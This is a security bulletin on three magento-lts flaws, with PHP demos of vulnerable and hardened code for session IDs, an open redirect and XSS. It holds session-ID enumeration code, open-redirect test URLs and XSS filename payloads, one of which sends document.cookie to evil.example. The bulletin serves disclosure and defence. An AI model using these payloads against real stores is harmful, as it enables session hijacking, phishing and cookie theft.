SB2026050512 - Multiple vulnerabilities in magento-lts

Published: May 5, 2026

Security Bulletin ID: SB2026050512
CSH Severity: High
Patch available: Yes
Number of vulnerabilities: 3
Exploitation vector: Remote access
Highest impact: Code execution

Breakdown by Severity

High 33% Medium 33% Low 33%

Description

This security bulletin contains information about 3 vulnerabilities.


1) Use of insufficiently random values (CVE-ID: CVE-2026-42155)

CWE-ID: CWE-330 - Use of Insufficiently Random Values

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:U/U:Amber


The vulnerability allows a remote attacker to hijack active API sessions and gain the capabilities of the authenticated API user.

The vulnerability exists due to use of insufficiently random values in API session ID generation in Mage/Api/Model/Session.php start() when handling API login requests. A remote attacker can generate candidate session identifiers and send crafted API requests to hijack active API sessions and gain the capabilities of the authenticated API user.

The issue affects legacy API surfaces that share the same session generation logic, including XML-RPC, SOAP v1, SOAP v2, and legacy REST.
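The contrast below is an added example written for this bulletin, not code from magento-lts. The bulletin does not say which weak source Mage/Api/Model/Session.php start() drew on, so a login-time-derived MD5 stands in for it; the session store is a plain array, and the login timestamp, window and API user name are constructed. It shows why "generate candidate session identifiers" is a realistic attack against a time-derived ID and a hopeless one against a 256-bit CSPRNG ID.

```php
<?php
// Added illustration for this bulletin, not code from magento-lts. The bulletin
// does not say which weak source Mage/Api/Model/Session.php start() drew on, so a
// login-time-derived MD5 stands in for it here; the session store is a plain array.
declare(strict_types=1);

// Stand-in weak generator: fully determined by the login time in microseconds,
// so the attacker's keyspace is only their uncertainty about that time.
function weakSessionId(int $loginMicros): string
{
    return md5((string) $loginMicros);
}

// Hardened generator: 256 bits from the OS CSPRNG. random_bytes() throws
// instead of silently falling back to a weaker source.
function strongSessionId(): string
{
    return bin2hex(random_bytes(32));
}

// Attacker side: with the login time known to within +/- $windowMicros (the
// Date header on the login response gives the second), enumerate every candidate.
function candidateIds(int $approxMicros, int $windowMicros): iterable
{
    for ($t = $approxMicros - $windowMicros; $t <= $approxMicros + $windowMicros; $t++) {
        yield weakSessionId($t);
    }
}

// Server side: constant-time comparison so the lookup itself does not leak
// how many leading bytes of a guess were right.
function findSession(string $presented, array $store): ?string
{
    foreach ($store as $sessionId => $apiUser) {
        if (hash_equals((string) $sessionId, $presented)) {
            return $apiUser;
        }
    }
    return null;
}

function countHijacks(array $store, int $approxMicros, int $windowMicros): int
{
    $hits = 0;
    foreach (candidateIds($approxMicros, $windowMicros) as $guess) {
        if (findSession($guess, $store) !== null) {
            $hits++;
        }
    }
    return $hits;
}

// Constructed scenario: the victim's API login happened at a time the attacker
// knows to the second.
$victimLoginMicros = 1778000000123456;
$guessMicros       = 1778000000500000; // middle of that second
$window            = 500000;           // +/- half a second => 1,000,001 candidates

$weakStore   = [weakSessionId($victimLoginMicros) => 'api_user_with_catalog_write'];
$strongStore = [strongSessionId()                 => 'api_user_with_catalog_write'];

printf("weak generator:   %d hijack(s) in %d guesses\n",
    countHijacks($weakStore, $guessMicros, $window), 2 * $window + 1);
printf("strong generator: %d hijack(s) in %d guesses\n",
    countHijacks($strongStore, $guessMicros, $window), 2 * $window + 1);
```

Run it with `php session_ids.php` (PHP 7.1 or later). The weak store is hit by exactly one of the million guesses; the strong store is never hit, because the 256-bit identifier cannot be narrowed by anything the attacker observes. Note that the same enumeration works against every surface that reuses the generator, which is why the XML-RPC, SOAP and legacy REST endpoints are all in scope.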


2) Open redirect (CVE-ID: CVE-2026-42207)

CWE-ID: CWE-601 - URL Redirection to Untrusted Site ('Open Redirect')

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Green


The vulnerability allows a remote attacker to redirect users to an arbitrary external URL.

The vulnerability exists due to URL redirection to an untrusted site in Mage_ProductAlert_AddController::stockAction() when handling the uenc query parameter for requests whose product_id does not match an existing catalog product. A remote attacker can send a specially crafted link to redirect users to an arbitrary external URL.

User interaction is required: the victim must follow the link while logged in as a customer, and the redirect fires only when the supplied product_id does not match an existing catalog product. The attacker needs no privileges of their own.
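The handler pair below is an added example written for this bulletin, not code from magento-lts. It assumes uenc carries a URL-safe base64 return address (Magento's uenc convention) and models only the missing-product branch of stockAction(); the store base URL, the query values and the six test URLs are constructed. The hardened version accepts a local path or a same-origin absolute URL and falls back to the store root for anything else.

```php
<?php
// Added illustration for this bulletin, not code from magento-lts. It assumes
// uenc carries a URL-safe base64 return address (Magento's uenc convention);
// the two stockAction() stand-ins below model only the missing-product branch.
declare(strict_types=1);

function decodeUenc(string $uenc): string
{
    $raw = base64_decode(strtr($uenc, '-_,', '+/='), true);
    return $raw === false ? '' : $raw;
}

// Allow only a local path or an absolute URL on the store's own origin.
function isSafeRedirect(string $target, string $baseUrl): bool
{
    // Backslashes and control bytes are parsed differently by browsers and by
    // parse_url(); reject them rather than reason about each browser.
    if ($target === '' || str_contains($target, '\\') || preg_match('/[\x00-\x1f\x7f]/', $target)) {
        return false;
    }
    $t = parse_url($target);
    $b = parse_url($baseUrl);
    if ($t === false || $b === false) {
        return false;
    }
    if (!isset($t['scheme']) && !isset($t['host'])) {
        // Relative reference. "//evil.example" never lands here: parse_url()
        // already reports a host for it, so it fails the origin check below.
        return str_starts_with($target, '/');
    }
    return strtolower($t['scheme'] ?? '') === strtolower($b['scheme'] ?? '')
        && strtolower($t['host'] ?? '') === strtolower($b['host'] ?? '')
        && ($t['port'] ?? null) === ($b['port'] ?? null)
        && !isset($t['user']) && !isset($t['pass']);
}

// Vulnerable stand-in: a non-existent product_id sends the customer wherever uenc says.
function stockActionVulnerable(array $query, bool $productExists, string $baseUrl): string
{
    if (!$productExists) {
        $target = decodeUenc($query['uenc'] ?? '');
        return $target !== '' ? $target : $baseUrl;
    }
    return $baseUrl . '/productalert/add/stock'; // success path, not modelled further
}

// Hardened stand-in: validate the decoded target, fall back to the store root.
function stockActionHardened(array $query, bool $productExists, string $baseUrl): string
{
    if (!$productExists) {
        $target = decodeUenc($query['uenc'] ?? '');
        return isSafeRedirect($target, $baseUrl) ? $target : $baseUrl;
    }
    return $baseUrl . '/productalert/add/stock';
}

// Constructed cases: two legitimate return addresses, four open-redirect attempts.
$base  = 'https://store.example';
$cases = [
    'https://store.example/customer/account/',
    '/customer/account/',
    'https://evil.example/phish',
    '//evil.example/phish',
    'https://store.example@evil.example/',
    'javascript:alert(1)',
];
foreach ($cases as $url) {
    $uenc  = strtr(base64_encode($url), '+/=', '-_,');
    $query = ['uenc' => $uenc, 'product_id' => '999999'];
    printf("%-44s vulnerable -> %s\n", $url, stockActionVulnerable($query, false, $base));
    printf("%-44s hardened   -> %s\n", '', stockActionHardened($query, false, $base));
}
```

Requires PHP 8.0 or later for str_contains() and str_starts_with(). The first two cases are followed by both handlers; the protocol-relative, credential-prefixed and javascript: forms are all followed by the vulnerable handler and all collapse to the store root in the hardened one, because each of them either parses to a foreign host or fails the scheme comparison.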


3) Improper Neutralization of Alternate XSS Syntax (CVE-ID: CVE-2026-42458)

CWE-ID: CWE-87 - Improper Neutralization of Alternate XSS Syntax

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear


The vulnerability allows a remote user to execute arbitrary script in the administrator's browser.

The vulnerability exists due to improper neutralization of alternate XSS syntax in the Import -> Data Flow (profiles) run functionality when rendering a user-controlled filename in the run profile page. A remote user can upload or reference a specially crafted filename to execute arbitrary script in the administrator's browser.

The issue is reachable in the admin panel during Import profile execution.
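The renderer pair below is an added example written for this bulletin, not code from magento-lts. The run page is modelled as three places a filename might be written (an HTML text node, an attribute value and a string inside an inline script); which of these the real Data Flow profile page uses is not stated in the bulletin, and the three filenames are constructed payloads. The point is that a filter keyed on one syntax (here, the literal "<script") is what CWE-87 alternate syntax gets past, whereas context-correct encoding does not care which syntax was used.

```php
<?php
// Added illustration for this bulletin, not code from magento-lts. The run page
// is modelled as three places a filename might be written: an HTML text node,
// an attribute value and a string inside an inline script. Which of these the
// real Data Flow profile page uses is not stated in the bulletin.
declare(strict_types=1);

// Vulnerable stand-in: strips "<script" and interpolates the rest, the kind of
// filter that the alternate syntaxes of CWE-87 walk straight past.
function renderRunPageVulnerable(string $filename): string
{
    $filtered = str_ireplace('<script', '', $filename);
    return "<p>Importing {$filtered}</p>\n"
         . "<input name=\"file\" value=\"{$filtered}\">\n"
         . "<script>var importFile = '{$filtered}';</script>\n";
}

// Hardened: one encoder per output context, nothing filtered or guessed.
function renderRunPageHardened(string $filename): string
{
    $html = htmlspecialchars($filename, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    $js   = json_encode(
        $filename,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return "<p>Importing {$html}</p>\n"
         . "<input name=\"file\" value=\"{$html}\">\n"
         . "<script>var importFile = {$js};</script>\n";
}

// Breakout check: render a benign name through the same template and compare the
// number of raw delimiters. Any extra '<', '"' or "'" came from the filename and
// reached the page unencoded.
function breaksOutOfTemplate(callable $render, string $filename): bool
{
    $benign = $render('report.csv');
    $page   = $render($filename);
    foreach (['<', '"', "'"] as $delim) {
        if (substr_count($page, $delim) !== substr_count($benign, $delim)) {
            return true;
        }
    }
    return false;
}

// Constructed filenames, none of which contains the literal "<script".
$payloads = [
    'report.csv"><img src=x onerror=alert(document.cookie)>',          // attribute breakout
    "report.csv';fetch('https://evil.example/?'+document.cookie);//",   // JS string breakout
    'report.csv</script><svg onload=alert(1)>',                         // closes the script block
];
foreach ($payloads as $name) {
    printf("%-66s vulnerable breaks out: %-3s hardened breaks out: %s\n",
        $name,
        breaksOutOfTemplate('renderRunPageVulnerable', $name) ? 'yes' : 'no',
        breaksOutOfTemplate('renderRunPageHardened', $name) ? 'yes' : 'no');
}
```

All three payloads break out of the vulnerable template and none breaks out of the hardened one. ENT_QUOTES covers the attribute context (both quote characters become entities), and the JSON_HEX_* flags keep `<`, `&` and both quotes out of the inline script so the `</script>` payload cannot close the block. For templates in the project itself the same encoding should come from the framework's own escaping helper rather than a hand-rolled filter.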


Remediation

Install the update from the vendor's website. Because the identifiers affected by CVE-2026-42155 are created at login, any API session started before the update still carries an identifier produced by the weak routine; expire or invalidate active API sessions once the fix is deployed.